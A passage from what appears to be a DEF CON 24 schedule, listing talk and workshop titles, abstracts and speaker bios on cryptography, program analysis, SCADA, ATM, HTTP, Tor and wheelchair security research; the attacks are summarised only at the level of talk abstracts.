Dan Petro is a Security Associate at Bishop Fox, a security consulting firm providing services to the Fortune 500, global financial institutions, and high-tech startups. In this role, he focuses on application and network penetration testing. He has presented at numerous conferences, including Black Hat USA, DEF CON, HOPE, BSides, and ToorCon. He has also been a featured guest speaker at Arizona State University, South Mountain Community College, and the Dark Reading University series. Dan has been quoted in various industry and mainstream publications such as Business Insider, Wired, The Guardian, and Mashable among others. He is widely known for the tools he has created: the Chromecast-hacking device, the RickMote ContRoller, and Untwister, a tool used for breaking pseudorandom number generators. He also organizes Root the Box, a capture the flag security competition. Additionally, Dan often appears on local and national news to discuss topical security issues. Dan holds a Master’s Degree in Computer Science from Arizona State University and doesn’t regret it.
Return to Index
CPV - Bronze 2 - Friday - 16:00-17:30
Talk Title:
Getting Started with Cryptography in Python [WORKSHOP]
Speaker Name, Employer or position:
Amirali Sanatinia - Northeastern University
Abstract:
Today we use cryptography almost everywhere, from surfing the web over HTTPS to working remotely over SSH. However, many of us do not appreciate the subtleties of crypto primitives, and the lack of correct and up-to-date resources leads to the design and development of vulnerable applications. In this talk, we cover the building blocks of modern crypto and how to develop secure applications in Python.
Bio:
Amirali Sanatinia is a Computer Science PhD candidate at Northeastern University, and holds a Bachelor's degree in CS from St Andrews University. His research focuses on cyber security and privacy, and has been covered by venues such as MIT Technology Review and ACM Tech News. He is also the OWASP Boston NEU Student chapter founder and leader.
Social media links if provided:
http://www.ccs.neu.edu/home/amirali
Return to Index
SkyTalks - Skyview 3 - Saturday - 11:00-11:59
Speaker: Cassiopiea
Talk: God is a Human II: Artificial Intelligence and the Nature of Reality
Last year I presented the original, God is a Human: Artificial Intelligence in an Ethical Society. This year I'm at it again, here to make you think about what you would really do if Artificial Intelligence became part of your world, only we're going to focus more on something we only brushed over last year: how are we going to hack AI?
I also want to talk about some other topics, including the FUD around AI. The movies and television would have you believe that you would know if AI were invading society, that armies of robots would march down the street and you would actually have something to fight, something to object to, but in reality, it's much more likely to come creeping quietly. Primitive and not-so-primitive AI is already here, in our games, in our phones, on our computers, in our homes. Did you even know that there is already a Campaign to Stop Killer Robots? How do you defend against something you hardly think about? And do you really need to?
Suggested reading: Isaac Asimov's I, Robot; Haselager's Robotics, Philosophy, and the Problems of Autonomy; Do Androids Dream of Electric Sheep?; Riedl and Harrison's Using Stories to Teach Human Values to Artificial Agents
Suggested viewing: Animatrix: The Second Renaissance; 2001: A Space Odyssey; Blade Runner (well, maybe just because it's a highly entertaining film)
AI AKA DeleriumEndless has been a Professional Human Being concerned with the interaction of people with machines for longer than she cares to admit. She started programming computers as a hobby on a Commodore 64, built her own computers and servers in the days of Win95 and on, and has been earning a wage in the IT field since 2007. Several times in there she went to school and took classes in philosophy, which led even further down the path of "What happens if computers learn to think like people..?", as well as computer sciences.
She has been observing machine/human interaction all that time, and has written some papers on human interaction in the field of security as well as some standard security blogs and observations on humanity and human interaction. She currently works for IBM as a security consultant and on the Watson project.
Return to Index
Demolabs - Table 3 - Saturday - 16:00-17:50
Graylog
Lennart Koopman
Graylog is a free and open source log management tool, aiming to be an affordable alternative to many expensive commercial solutions.
Lennart Koopman is the founder and original developer of Graylog. Before that he was a software architect at XING in Germany.
Return to Index
Workshops - Las Vegas Ballroom 1 - Saturday - 10:00-14:00
Guaranteed Security
Vivek Notani, PhD Student, University of Verona
Dr. Roberto Giacobazzi, Senior Professor, University of Verona
Can you guarantee that the software you created does not contain any runtime errors or data races and would not be susceptible to buffer overflow or floating point errors? Can you create a program that can take any arbitrary program as an input and certify it as free from such errors or alert you of possible avenues of errors? Is such a thing even possible? Turns out, yes you can, or at least after this training you will be able to.
Recent advances in the field of formal program analysis have led to the development of theories and tools that can, given a program as input, either guarantee the absence of certain types of errors or raise alarms to alert of possible weaknesses in the given program. Sounds like black magic? The goal of this training is to demystify the science behind automated program analysis and build a solid foundation for attendees to start building their own tools that can automatically analyze and certify code correctness.
The workshop will cover the challenges in automated program analysis, what is possible and what is not possible, and why. We will focus on using Abstract Interpretation, a widely used formal framework, for describing sound-by-construction program analysis algorithms as approximations of the semantics of the language. Finally, in the hands-on session, we will build our own code analyzer for a simple language that can analyze any program written in that language and issue certificates of correctness.
Vivek Notani is a PhD student at the University of Verona, under Dr. Roberto Giacobazzi. Previously, Vivek worked as a research scholar at the University of Louisiana at Lafayette (USA), focusing on dynamic methods of malware analysis and machine learning applications to malware analysis and reverse engineering. His research at UL Lafayette led to the creation of VirusBattle, an automated malware analysis system that harvests intelligence from large malware repositories, which was presented at Black Hat last year. VirusBattle has since been commercialized by Cythereal LLC, USA. Early on in his career, Vivek worked in humanoid robotics and helped create Acyut, a series of India's first indigenously developed humanoid robots, which set a world record in humanoid weightlifting at FIRA-2010.
Roberto Giacobazzi is a senior professor of computer science at the University of Verona and the Scientific Leader of the SPY-Lab. He received his Ph.D. in Computer Science in 1993 from the University of Pisa. From 1993 to 1995 he held a postdoctoral research position at the Laboratoire d'Informatique (LIX), Ecole Polytechnique (Paris) in the equipe Cousot, the creator of the theory of Abstract Interpretation. His research interests include abstract interpretation, static program analysis, semantics of programming languages, program verification, abstract model-checking, program transformation and optimization, digital asset protection, code obfuscation, software watermarking and lattice theory. He is the author of more than 100 publications in international journals and conferences and is involved in national (Italian) and international (European) research projects in the field of static program analysis. His main current research interest is in formal methods for the systematic design of domains and transfer functions for abstract interpretation, with application in security, digital asset protection, code obfuscation, watermarking, malware analysis, semantics, program analysis, and abstract model-checking. In the past, he gave a declarative semantics for Prolog control features and studied new methodologies to design static program analyzers and optimization techniques for logic and constraint-based languages by abstract interpretation. In lattice theory he contributed to the understanding of the structure of the lattice of closure operators and complete congruence relations on complete lattices. He is on the Steering Committee of the Static Analysis Symposium and of the ACM Conference on Principles of Programming Languages (POPL). Dr. Giacobazzi's research in abstract interpretation led to the creation of Julia in 2006, which has since been acquired by the Corvallis Group, a leading firm in software development and assurance in the banking market.
Max Class Size: 55
Prerequisites for students:
- Programming background in C++
- Understanding of Software development and testing methods
- Basic understanding of these theories will be helpful but is not required: static analysis, dynamic analysis, lattice theory, fixpoint theory, and abstract interpretation.
Materials or Equipment students will need to bring to participate: Laptop with Linux. Instructors will be using Ubuntu.
Please install the IKOS library. Download from:
https://ti.arc.nasa.gov/opensource/ikos/
Installation instructions available here:
https://ti.arc.nasa.gov/m/opensource/downloads/ikos/INSTALL_linux.pdf
Return to Index
Workshops - Las Vegas Ballroom 1 - Saturday - 14:00-18:00
Guaranteed Security
Vivek Notani, PhD Student, University of Verona
Dr. Roberto Giacobazzi, Senior Professor, University of Verona
Can you guarantee that the software you created does not contain any runtime errors or data races and would not be susceptible to buffer overflow or floating point errors? Can you create a program that can take any arbitrary program as an input and certify it as free from such errors or alert you of possible avenues of errors? Is such a thing even possible? Turns out, yes you can, or at least after this training you will be able to.
Recent advances in the field of formal program analysis have led to the development of theories and tools that can, given a program as input, either guarantee the absence of certain types of errors or raise alarms to alert of possible weaknesses in the given program. Sounds like black magic? The goal of this training is to demystify the science behind automated program analysis and build a solid foundation for attendees to start building their own tools that can automatically analyze and certify code correctness.
The workshop will cover the challenges in automated program analysis, what is possible and what is not possible, and why. We will focus on using Abstract Interpretation, a widely used formal framework, for describing sound-by-construction program analysis algorithms as approximations of the semantics of the language. Finally, in the hands-on session, we will build our own code analyzer for a simple language that can analyze any program written in that language and issue certificates of correctness.
Vivek Notani is a PhD student at the University of Verona, under Dr. Roberto Giacobazzi. Previously, Vivek worked as a research scholar at the University of Louisiana at Lafayette (USA), focusing on dynamic methods of malware analysis and machine learning applications to malware analysis and reverse engineering. His research at UL Lafayette led to the creation of VirusBattle, an automated malware analysis system that harvests intelligence from large malware repositories, which was presented at Black Hat last year. VirusBattle has since been commercialized by Cythereal LLC, USA. Early on in his career, Vivek worked in humanoid robotics and helped create Acyut, a series of India's first indigenously developed humanoid robots, which set a world record in humanoid weightlifting at FIRA-2010.
Roberto Giacobazzi is a senior professor of computer science at the University of Verona and the Scientific Leader of the SPY-Lab. He received his Ph.D. in Computer Science in 1993 from the University of Pisa. From 1993 to 1995 he held a postdoctoral research position at the Laboratoire d'Informatique (LIX), Ecole Polytechnique (Paris) in the equipe Cousot, the creator of the theory of Abstract Interpretation. His research interests include abstract interpretation, static program analysis, semantics of programming languages, program verification, abstract model-checking, program transformation and optimization, digital asset protection, code obfuscation, software watermarking and lattice theory. He is the author of more than 100 publications in international journals and conferences and is involved in national (Italian) and international (European) research projects in the field of static program analysis. His main current research interest is in formal methods for the systematic design of domains and transfer functions for abstract interpretation, with application in security, digital asset protection, code obfuscation, watermarking, malware analysis, semantics, program analysis, and abstract model-checking. In the past, he gave a declarative semantics for Prolog control features and studied new methodologies to design static program analyzers and optimization techniques for logic and constraint-based languages by abstract interpretation. In lattice theory he contributed to the understanding of the structure of the lattice of closure operators and complete congruence relations on complete lattices. He is on the Steering Committee of the Static Analysis Symposium and of the ACM Conference on Principles of Programming Languages (POPL). Dr. Giacobazzi's research in abstract interpretation led to the creation of Julia in 2006, which has since been acquired by the Corvallis Group, a leading firm in software development and assurance in the banking market.
Max Class Size: 55
Prerequisites for students:
- Programming background in C++
- Understanding of Software development and testing methods
- Basic understanding of these theories will be helpful but is not required: static analysis, dynamic analysis, lattice theory, fixpoint theory, and abstract interpretation.
Materials or Equipment students will need to bring to participate: Laptop with Linux. Instructors will be using Ubuntu.
Please install the IKOS library. Download from:
https://ti.arc.nasa.gov/opensource/ikos/
Installation instructions available here:
https://ti.arc.nasa.gov/m/opensource/downloads/ikos/INSTALL_linux.pdf
Return to Index
DEFCON - DEF CON 101 - Thursday - 15:00-15:59
Hacker Fundamentals and Cutting Through Abstraction
LosT
Continuing the series of hacker foundational skills, YbfG jvyy nqqerff shaqnzragny fxvyyf gung rirel unpxre fubhyq xabj. Whfg sbe sha jr jvyy nyfb tb sebz gur guerr onfvp ybtvp tngrf gb n shapgvbany cebprffbe juvyr enpvat n pybpx. Qb lbh xabj ubj n cebprffbe ernyyl jbexf? Jul qb lbh pner? Pbzr svaq bhg. Bu, naq pelcgb.
Ryan "1o57" Clarke self-identifies as a hacker. Formerly a member of the Advanced Programs Group (APG) at Intel, he continues to do 'security stuff' for other companies and groups. Professionally, LosT's history includes working for various groups and companies, as well as for the University of Advancing Technology, where he set up the robotics and embedded systems degree program. He has consulted for the Department of Energy, Fortune 50 companies, and multiple domestic and international organizations. For DEFCON he has created the Hardware Hacking Village, the LosT@Defcon Mystery Challenge, and conference badges, cryptography, and puzzles. As DEFCON’s official cryptographer and puzzle master, his activities have included aspects of network intrusion and security, social engineering, RED and BLUE team testing, mathematics, linguistics, physical security, and various other security and hacker related skillsets. 1o57's academic background and interests include computational mathematics, linguistics, cryptography, electrical engineering, computer systems engineering and computer science-y stuff.
Return to Index
DEFCON - Track Three - Saturday - 14:00-14:59
Hacker-Machine Interface - State of the Union for SCADA HMI Vulnerabilities
Brian Gorenc Senior Manager, Trend Micro Zero Day Initiative
Fritz Sands Security Researcher, Trend Micro Zero Day Initiative
Over the last year, synchronized and coordinated attacks against critical infrastructure have taken center stage. Remote cyber intrusions at three Ukrainian regional electric power distribution companies in December 2015 left approximately 225,000 customers without power. Malware, like BlackEnergy, is being specially developed to target supervisory control and data acquisition (SCADA) systems. Specifically, adversaries are focusing their efforts on obtaining access to the human-machine interface (HMI) solutions that act as the main hub for managing the operation of the control system. Vulnerabilities in these SCADA HMI solutions are, and will continue to be, highly valuable as we usher in this new era of software exploitation. This talk covers an in-depth analysis performed on a corpus of 200+ confirmed SCADA HMI vulnerabilities. It details the popular vulnerability types discovered in HMI solutions developed by the biggest SCADA vendors, including Schneider Electric, Siemens, General Electric, and Advantech. It studies the weaknesses in the technologies used to develop HMI solutions and describes how critical vulnerabilities manifest in the underlying code. The talk will compare the time-to-patch performance of various SCADA vendors along with a comparison of the SCADA industry to the rest of the software industry. Finally, using the data presented, additional guidance will be provided to SCADA researchers along with a prediction of what we expect next in attacks that leverage SCADA HMI vulnerabilities.
Brian Gorenc is the senior manager of Vulnerability Research with Trend Micro. In this role, Gorenc leads the Zero Day Initiative (ZDI) program, which represents the world’s largest vendor-agnostic bug bounty program. His focus includes analyzing and performing root-cause analysis on hundreds of zero-day vulnerabilities submitted by ZDI researchers from around the world. The ZDI works to expose and remediate weaknesses in the world’s most popular software. Brian is also responsible for organizing the ever-popular Pwn2Own hacking competitions.
Twitter: @thezdi, @maliciousinput
Fritz Sands is a security researcher with Trend Micro's Zero Day Initiative. In this role, he analyzes and performs root-cause analysis on vulnerabilities submitted to the ZDI program, which is the world's largest vendor-agnostic bug bounty program. Fritz also focuses on writing tools to perform static and dynamic analysis for discovering vulnerabilities. Prior to joining the ZDI in 2014, Sands was in Microsoft's Trustworthy Computing and Secure Windows Initiative operations where he audited Windows code and developed dynamic analysis tools, and before that he was a system developer for multiple iterations of Microsoft Windows.
Twitter: @FritzSands
www.zerodayinitiative.com
Return to Index
DEFCON - Track Two - Sunday - 10:00-10:59
Hacking Hotel Keys and Point of Sale Systems: Attacking Systems Using Magnetic Secure Transmission
Weston Hecker Senior Security Engineer & Pentester, Rapid7
Take a look at weaknesses in point-of-sale systems and the foundation of hotel key data and the property management systems that manage the keys. Using a modified MST injection method, Weston will demonstrate several attacks on POS systems and hotel keys, including brute forcing other guests' keys from your own card information as a starting point, and methods of injecting keystrokes into POS systems just as if you had a keyboard plugged into the system. This includes injecting keystrokes to open the cash drawer and abusing magstripe-based rewards programs that are used in a variety of environments, from retail down to rewards programs in slot machines.
11 years of pen-testing, 12 years of security research and programming experience. Working for a security company in the Midwest, Weston has recently spoken at DEF CON 22 & 23, Black Hat USA 2016, Enterprise Connect 2016, ISC2 Security Congress, SC Congress Toronto, HOPE11, BSides Boston and over 50 other speaking engagements, from regional telecom events to universities, on security subject matter. Working with a major university's research project with the Department of Homeland Security on 911 emergency systems and attack mitigation. Attended school in Minneapolis, Minnesota: Computer Science and Geophysics. Found several vulnerabilities in very popular software and firmware, including Microsoft, Qualcomm, Samsung, HTC, Verizon.
Return to Index
Workshops - Las Vegas Ballroom 6 - Thursday - 10:00-14:00
Hacking Network Protocols using Kali
Thomas Wilhelm Associate Professor, NSACAE University
Todd Kendall Security Consultant
There are a lot of hacking tutorials on how to compromise servers, but what about network devices?
In this workshop, we will demonstrate how to conduct penetration tests against a number of different network protocols, specifically those at layer 2 and 3 of the OSI model, in order to assess and circumvent the security of an organization. Participants will be able to watch a demonstration on how to leverage insecurities in different protocols, and replicate the attacks themselves in a lab environment at the workshop. In addition, we will discuss what steps network engineers can do to limit the insecurities.
This workshop will contain network devices in which participants will be able to connect to and perform the demonstrated attacks. Participation will be reduced since network equipment resources are limited, unless additional lab equipment can be procured.
Thomas Wilhelm has been an associate professor at an NSACAE university, where he has taught information assurance for many years at both the master's and undergraduate level. He has been a penetration tester and team lead for Fortune 100 companies, and has spent the last 20+ years involved in information security.
Thomas has authored numerous articles and books over the years on hacking; the latest is titled "Professional Penetration Testing (vol 2)," published by Syngress, which has been printed in multiple languages. Thomas holds two master's degrees (MSCS, MSM) and maintains the following certifications: ISSMP, CISSP, CCNP Security, SCSECA, SCNA, SCSA, IEM, IAM.
Todd Kendall is a security consultant with extensive experience in both the commercial and government security world. Todd is currently responsible for performing vulnerability assessments on operational networks to Fortune 100 companies, and has been heavily involved in incident response and management for finance, healthcare, and utility industries. Todd has expe
Max Class Size: 32
Prerequisites for students: It is required for students to understand the OSI model and specifics of well-known network protocols, particularly those found at layer 2 and layer 3 of the OSI model.
Materials or Equipment students will need to bring to participate: Participants should have a laptop that contains an up to date Kali Linux image. In addition, if they want to participate in actual network protocol attacks, they should bring CAT5 cables for connectivity. This class will not spend time getting students online - participants should already be familiar with configuring static IP addresses and/or DHCP for their systems. Because participants will be able to connect to a lab environment with active exploits, it is suggested that students use a computer system that can be easily re-imaged at the end of the workshop.
Return to Index
DEFCON - Track One - Friday - 17:00-17:59
Hacking Next-Gen ATMs From Capture to Cashout
Weston Hecker Senior Security Engineer & Pentester, Rapid7
EMV (Chip & PIN) card ATMs are taking over the industry; with the deadlines passed and approaching, the industry is rushing ATMs to the market. Are they more secure and hack proof? Over the past year I have worked at understanding and breaking the new methods that ATM manufacturers have implemented on production 'Next Generation' secure ATM systems. This includes bypassing anti-skimming/anti-shimming methods introduced to the latest generation of ATMs, along with an NFC long-range attack that allows real-time card communication from over 400 miles away. This talk will demonstrate how, with a $2000 investment, criminals can do unattended 'cash outs', touching also on failures of the past with EMV implementations and on how credit card data of the future will most likely be sold, given that the new EMV data has such a short life span.
With a rise-of-the-machines theme, there will be a demonstration of 'La-Cara', an automated cash-out machine that works on current EMV and NFC ATMs. It is an entire fascia placed on the machine to hide the automatic PIN keyboard and flashable EMV card system that is silently withdrawing money from harvested card data. This demonstration of the system can cash out around $20,000/$50,000 in 15 min.
11 years of pen-testing, 12 years of security research and programming experience. Working for a security company in the Midwest, Weston has recently spoken at DEF CON 22 & 23, Black Hat USA 2016, Enterprise Connect 2016, ISC2 Security Congress, SC Congress Toronto, HOPE11, BSides Boston and over 50 other speaking engagements, from regional telecom events to universities, on security subject matter. Working with a major university's research project with the Department of Homeland Security on 911 emergency systems and attack mitigation. Attended school in Minneapolis, Minnesota: Computer Science and Geophysics. Found several vulnerabilities in very popular software and firmware, including Microsoft, Qualcomm, Samsung, HTC, Verizon.
Return to Index
BHV - Skyview 4 - Sunday - 11:00-11:59
Speaker: Scott Novich
About Scott Novich:
"Great Scott" / Scott Novich is Co-Founder and CTO at NeoSensory, Inc., a wearable technology startup that gives people new senses. It is a spin-off of his PhD research with his co-founder, Chief Science Officer, and former neuroscience PhD advisor, Dr. David Eagleman.
Abstract:
"Sensory substitution", mapping information from one sense to another, has been one of neuroscience's most underground research areas for decades. Recently, it has been truly enabled by inexpensive computing power and compact energy storage. In this talk, I will cover my PhD work on the topic and how it has enabled not just providing people with preexisting senses, but entirely new senses.
Return to Index
BHV - Skyview 4 - Saturday - 10:30-10:59
Speakers: Travis Lawrence
About Travis:
Travis Lawrence is currently a PhD candidate in Quantitative and Systems Biology at University of California, Merced. He developed an interest in both biodiversity and computers early in life. During college, he stumbled into the field of evolutionary biology which allowed him to pursue his interests in computer programming and biodiversity. The questions that are of the most interest to him are at the interface of evolutionary biology, genomics and bioinformatics.
Abstract:
Recent advances in genome editing have quickly turned ideas thought restricted to science fiction, such as custom synthetic organisms and designer babies, into reality. These technologies rely on the fidelity of the genetic code, which translates nucleotides into proteins. The underlying mechanism of translation is well understood: triplets of nucleotides, known as codons, are recognized by transfer RNAs with complementary nucleotide triplets. These transfer RNAs carry one of twenty amino acids, which are then added to the growing protein chain by the ribosome. However, relatively little work has examined how a transfer RNA that recognizes a certain codon always carries the correct amino acid. The rules that determine which amino acid a transfer RNA carries have been termed the second genetic code. I have developed a computational method based on information theory that can elucidate the second genetic code from genomic sequences. Interestingly, the second genetic code is highly variable between organisms, unlike the genetic code, which is relatively static. I will present how my method cracks the second genetic code and how the variability of the second genetic code can be exploited to develop new treatments to combat bacterial infections and parasites, create targeted bio-controls to combat invasive species, and expand the genetic code to incorporate exotic amino acids.
Return to Index
Wireless - Skyview 1 - Friday - 12:30-12:50
Tim O'Shea
Bio
Restless Software Radio Turned Machine Learning Experimentalist
@oshtim
Handing Full Control of the Radio Spectrum over to the Machines
Abstract
Software radio is hard; let's just teach machines to do it for us. They do pretty much everything else better than us already anyway. This talk will present an overview of recent work applying machine learning, especially deep neural networks, to learning in the radio spectrum on top of GNU Radio: teaching machines to control, sense, and otherwise interact with the radio spectrum faster and more effectively than our handcrafted or manual methods.
Return to Index
Workshops - Las Vegas Ballroom 4 - Saturday - 14:00-18:00
Hands-on Cryptography with Python
Sam Bowne Professor, City College San Francisco
Dylan James Smith
Learn essential concepts of cryptography as it is used on the modern Internet, including hashing, symmetric encryption, and asymmetric encryption. Then perform hands-on projects calculating hashes and encrypting secrets with RSA and AES, and compete to solve challenges including cracking Windows and Linux password hashes, short and poorly-chosen RSA public keys, and poorly-chosen AES keys.
All materials, projects, and challenges are freely available at samsclass.info.
Sam Bowne has been teaching computer networking and security classes at City College San Francisco since 2000. He has given talks and hands-on trainings at DEF CON, HOPE, B-Sides SF, B-Sides LV, and many other cons. He has a PhD and a CISSP and a lot of T-shirts.
Dylan James Smith assisted Sam Bowne with hands-on workshops last year at DEF CON and B-Sides LV. He's a Mac guru and skilled at fixing PC's, Linux problems, and network problems too.
Max Class Size: 55
Prerequisites for students: None
Materials or Equipment students will need to bring to participate: Students need to bring a computer that can run Python; any version of Mac, Windows, or Linux will be fine. I will have a few loaner computers for students who don't have a usable computer.
Return to Index
BHV - Skyview 4 - Friday - 14:30-14:59
Speakers: Julian Dana
About Julian:
Julian is a Security Consultant with more than 20 years of experience. He has experience in hands-on security testing and also teaching different technical security trainings. Julian, as a frustrated doctor, was always passionate and curious about the human body.
Abstract:
The software as a service (SaaS) model is the same model that we are using for our health... Unbelievable: we are treating symptoms and not curing diseases...
Return to Index
DEFCON - Track One - Sunday - 14:00-14:59
Help, I've got ANTs!!!
Tamas Szakaly Lead Security Researcher, PR-Audit Ltd., Hungary
As stated in my bio, besides computer security I also love flight simulators and mountain biking. Last year I gave a talk about hacking a flight simulator (among other games), so it was only fitting to research something related to my other hobby too. Old-day bike speedometers have evolved quite a bit, and nowadays a lot of bikers (swimmers, runners, ers) do their sport with tiny computers attached to them. These computers do much more than measuring speed: they have GPS, they can store your activities, they can be your training buddy, and they can communicate with various sensors (cadence, power meter, heart rate monitors, you name it), mobile phones, each other, and PCs. One of the communication protocols used by these devices is ANT. Never heard of it? Not surprising: it is not very well known despite being utilized by a lot of gadgets including, but not limited to, sport watches, mobile phones, weight scales, some medical devices, and even bicycle lights and radars. When I bought my first bike computer I rationalized it with thoughts like 'this will help me navigate on the mountain', or 'I can track how much I've developed', but deep down I knew the real reason was my curiosity about this lesser known, lesser researched protocol.
One of my favorite kinds of weaknesses is the kind caused by questionable design decisions, which can be spotted without actual hands-on experience with the product itself, just by reading the documentation. Well, this is exactly what happened here: I had some attack vectors ready and waiting well before I received the actual device. To top it all, I've also found some implementation bugs after getting my hands on various Garmin devices.
After a brief introduction to the ANT, ANT+ and ANT-FS protocols, I'll explain and demo both the implementation and the protocol weaknesses and reach the already suspected conclusion that ANT and the devices that use it are absolutely insecure: anybody can access your information, turn off your bike light, or even replace the firmware on your sport watch over the air.
Tamas is the lead IT security researcher at PR-Audit Ltd., a company focusing mainly on penetration testing and SIEM software development. Previously he participated in a cooperation between the ELTE Department of Meteorology and Paks Nuclear Power Plant Ltd. whose goal was to develop TREX, a toxic waste emission simulator using CUDA. The scene from RoboCop where the kid defeats the evil robot with just a laptop and a serial cable made a huge impression on him, and after seeing the movie his path was set: he was bound to be a hacker. His first experiences in this field involved poking around various copy protection schemes, and to this day his favorite areas of expertise are the ones that require some mangling of binary files. Besides computer security he also loves mountain biking and flight simulators.
Twitter: @sghctoma
Facebook: sghctoma
Return to Index
DEFCON - Track One - Sunday - 11:00-11:59
Hiding Wookiees in HTTP - HTTP smuggling is a thing we should know better and care about
regilero DevOp, Makina Corpus
HTTP is everywhere, everybody wants to write an HTTP server. So I wrote mine :-) But mine is not fast, and comes with an HTTP client which sends very bad HTTP queries. My tool is a stress tester for HTTP servers and proxies, and I wrote it because I found flaws in all HTTP agents that I have checked in the last year, i.e. nodejs, golang, Apache httpd, FreeBSD http, Nginx, Varnish and even Haproxy. This presentation will try to explain how flaws in HTTP parsers can be exploited for bad things; we'll play with HTTP to inject unexpected content in the user's browser, or perform actions in his name.
If you know nothing about HTTP it should be understandable, but you'll have to trust me blindly at the end. If you think you know HTTP, you have no reason to avoid this talk. Then, in the short part, I will show you this new open source stress tool that I wrote and hope that you will remember it when you write your own HTTP parser for your new f** language.
regilero is a DevOp, and this started far before this term. Twenty years in open source as web developer, sysadmin, web security training, database performance, tuning, audits. Took some time to be the top Apache responder on Stack Overflow, some stuff on SaltStack, made two daughters also. HTTP was the missing piece; like everyone he uses it every day, but never took the time to really test the HTTP tools. Last year he started checking... and found some interesting issues.
Twitter: @regilero
Stack Overflow
Return to Index
CPV - Bronze 2 - Saturday - 16:00-18:00
Talk Title:
Highlights from the Matasano Challenges [WORKSHOP]
Speaker Name, Employer or position:
Matt Cheung
Abstract:
The Matasano Challenges were a set of challenges designed to increase understanding of weaknesses in implementations of cryptosystems. In this workshop we will work through a selection of challenges that will give exposure to a variety of attacks. The goal of this workshop is to allow participants to more carefully consider decisions when designing systems that use cryptography as well as how to assess other systems.
* Participation in this workshop will require some programming skills to conduct the attacks.
* Participants should have a laptop with a development environment for the language of their choice. They should also have Burp Suite or another MITM proxy of their choice.
Bio:
Matt developed his interest and skills in cryptography during graduate work in Mathematics and Computer Science. During this time he had an internship at HRL Laboratories LLC working on implementing elliptic curve support for a Secure (in the honest-but-curious model) Two-Party Computation protocol. From there he implemented the version secure in the malicious model. He currently works as a QA engineer at Veracode, but continues to learn about cryptography in his spare time.
Social media links if provided:
@nullpsifer
Return to Index
SkyTalks - Skyview 3 - Sunday - 13:00-13:59
Speakers: Shane Kemper and the headless chook
Talk: Homologation Friend or Frenemy?
This is part two of a talk done many years ago, and it illustrates the new global era of regulatory demands. Across the globe, organizations are aggressively working on meeting these new regulatory standards using systems engineering. This presentation is part primer on systems engineering and walks the attendees through specific events in the life-cycle (development, qualification, and acceptance) of a product where it is possible to create, or limit the potential to create, backdoors in a product or system. Additionally, this presentation illustrates how the regulatory demands of homologation can create backdoors and how the lack of proper systems engineering could keep backdoors in place.
Return to Index
DEFCON - Track One - Friday - 12:00-12:59
Honey Onions: Exposing Snooping Tor HSDir Relays
Guevara Noubir Professor, College of Computer and Information Science, Northeastern University
Amirali Sanatinia PhD candidate, College of Computer and Information Science, Northeastern University
Tor is a widely used anonymity network that protects users' privacy and identity from corporations, agencies and governments. However, Tor remains a practical system with a variety of limitations, some of which were indeed exploited in the recent past. In particular, Tor's security relies on the fact that a substantial number of its nodes do not misbehave.
Previous work showed the existence of malicious participating Tor relays. For example, there are some Exit nodes that actively interfere with users' traffic and carry out man-in-the-middle attacks. In this work we expose another category of misbehaving Tor relays (HSDirs) that are integral to the functioning of the hidden services and the dark web. The HSDirs act as the DNS directory for the dark web. Because of their nature, detecting their malicious intent and behavior is much harder. We introduce the concept of honey onions (honions), a framework to detect misbehaving Tor relays with HSDir capability. By setting up and deploying a large scale honion over Tor for more than 72 days, we are able to obtain lower bounds on misbehavior among HSDirs.
We propose algorithms to both estimate the number of snooping HSDirs and identify them, using optimization and feasibility techniques. Our experimental results indicate that during the period of our work at least 110 such nodes were snooping information about hidden services they host. We reveal that more than half of them were hosted on cloud infrastructure and delayed the use of the learned information to prevent easy traceback. Furthermore, we provide the geolocation map of the identified snooping Tor HSDirs.
Guevara Noubir holds a PhD in Computer Science from EPFL and is currently a Professor at Northeastern University. His research focuses on privacy and security. He is a recipient of the National Science Foundation CAREER Award (2005). He led the winning team of the 2013 DARPA Spectrum Cooperative Challenge. Dr. Noubir held visiting research positions at Eurecom, MIT, and UNL. He served as program co-chair of several conferences in his areas of expertise, such as the ACM Conference on Security and Privacy in Wireless and Mobile Networks and the IEEE Conference on Communications and Network Security. He serves on the editorial boards of the ACM Transactions on Information and Systems Security and IEEE Transactions on Mobile Computing.
Amirali Sanatinia is a Computer Science PhD candidate at Northeastern advised by Professor Guevara Noubir, and holds a Bachelor's degree in CS from St Andrews University. His research focuses on cyber security and privacy, and has been covered by venues such as MIT Technology Review and ACM Tech News. He is also the OWASP Boston NEU Student chapter founder and leader.
Return to Index
Demolabs - Table 6 - Saturday - 10:00-11:50
HoneyPy and HoneyDB
Phillip Maddux
HoneyPy is an extensible low- to medium-interaction honeypot written in Python. It can be used as a research or production honeypot and can easily be integrated with other tools for alerting and analysis (e.g. Slack, Twitter, Splunk, Elasticsearch, etc).
HoneyDB is a web site that collects data from HoneyPy sensors on the Internet and publishes this data in an easy to consume format via APIs.
Phillip Maddux recently joined Signal Sciences as a Senior Solutions Engineer where his goal is to help organizations protect their web applications by enabling visibility into web application attacks and anomalies. Prior to Signal Sciences he focused on application security in the financial services industry. In his spare time he enjoys coding and experimenting with various open source security tools.
Return to Index
IOT - Bronze 4 - Saturday - 10:10-10:50
Hot Wheels: Hacking Electronic Wheelchairs
Stephen Chavez
We are going to exploit a Sunrise Quickie Rhythm power wheelchair that uses the CAN bus protocol, using Arduino/Raspberry Pi hardware. We will show how easy it is to inject standard CAN messages to take full control of the chair and block all user input from the main joystick controller. In addition, we provide some basic open source tools to allow people to customize their chairs more easily.
Some electronic wheelchairs use the same signaling bus as cars do: the Controller Area Network (CAN). But they use a specialized communication protocol like RNET that leverages CAN bus signaling. The Quickie Rhythm chair uses RNET electronics that we studied inside and out, and it turns out many other chairs use RNET electronics as a standardized protocol. RNET is closed and proprietary, but we reverse engineered the protocol, which will allow people to customize their chairs.
Power wheelchairs have become increasingly sophisticated both for increasing their capabilities and for connecting users to the world at large. Some include Bluetooth functionality, which can be an easy way to attack chairs. It is time to teach people to understand how their chairs work, and show them the current status of software security on the chairs.
Special thanks to:
Steven Beaty, my professor who helped me get organized for DEFCON 24. I thank him for doing a ton of meetings with me.
Solid State Depot, a hacker space in Boulder, Colorado. This hackerspace has some of the coolest people I ever met in my life. They allowed me to use their tools and they fully supported me in hacking power wheelchairs.
Metropolitan State University of Denver, they paid all of my expenses for DEFCON.
Stephen specializes in Linux, security, and programming languages such as Java, Go, Python, Rust, PHP, C, C++, JavaScript, and C#. He has experience in Linux server administration (Apache, Postfix, Dovecot, BIND, NGINX, etc.) as well as software engineering and web design. Stephen has been programming for 10+ years and knows quite a lot about a wide range of subjects. In his spare time, Stephen is a researcher in the field of computer and internet security and is knowledgeable about hacking, cryptography, and network attacks.
